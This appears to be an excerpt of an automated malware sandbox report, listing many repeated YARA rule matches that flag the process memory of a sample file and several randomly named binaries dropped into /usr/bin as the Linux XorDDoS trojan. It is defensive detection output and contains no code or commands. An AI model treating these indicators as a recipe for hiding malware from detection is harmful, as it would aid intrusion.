Source: Process Memory Space: eTASxT3bjO.elf PID: 5538, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5541, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5548, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5551, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5553, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5556, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5558, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5565, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5568, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5570, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5573, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5576, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5582, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5585, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5589, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5592, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5594, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5601, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5604, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5606, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5609, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5612, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5620, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5623, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5625, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5628, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5631, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5638, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5641, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5643, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5646, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5648, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5655, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5657, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5660, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5663, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5666, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5672, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5675, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5677, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5680, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5683, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5691, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5694, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5696, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5699, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: eTASxT3bjO.elf PID: 5702, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/ygqhgbaeei, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/kffnhivjdw, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/svkksitypo, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/eoogzzilvp, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/xjdcsmwtwe, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/evbjclrakz, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/wvicexcnqi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/wvicexcnqi, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: /usr/bin/zqylkjndwx, type: DROPPED	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: /usr/bin/mqnpjwpasf, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
